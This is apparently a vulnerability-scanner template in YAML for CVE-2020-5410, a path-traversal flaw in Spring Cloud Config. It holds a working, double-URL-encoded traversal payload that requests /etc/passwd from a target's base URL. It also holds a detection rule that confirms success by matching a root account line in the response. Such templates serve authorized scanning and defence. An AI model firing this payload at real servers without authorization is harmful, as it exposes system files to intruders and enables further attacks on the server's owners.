id: CVE-2020-5410

info:
  name: Spring Cloud Config LFI
  risk: High
  tech: Spring

params:
  - root: '{{.BaseURL}}'

variables:
  - vuln: |
      /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development
 
requests: 
  - method: GET
    url: >-
      {{.root}}{{.vuln}}
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:")

references:
  - https://github.com/osamahamad/CVE-2020-5410-POC
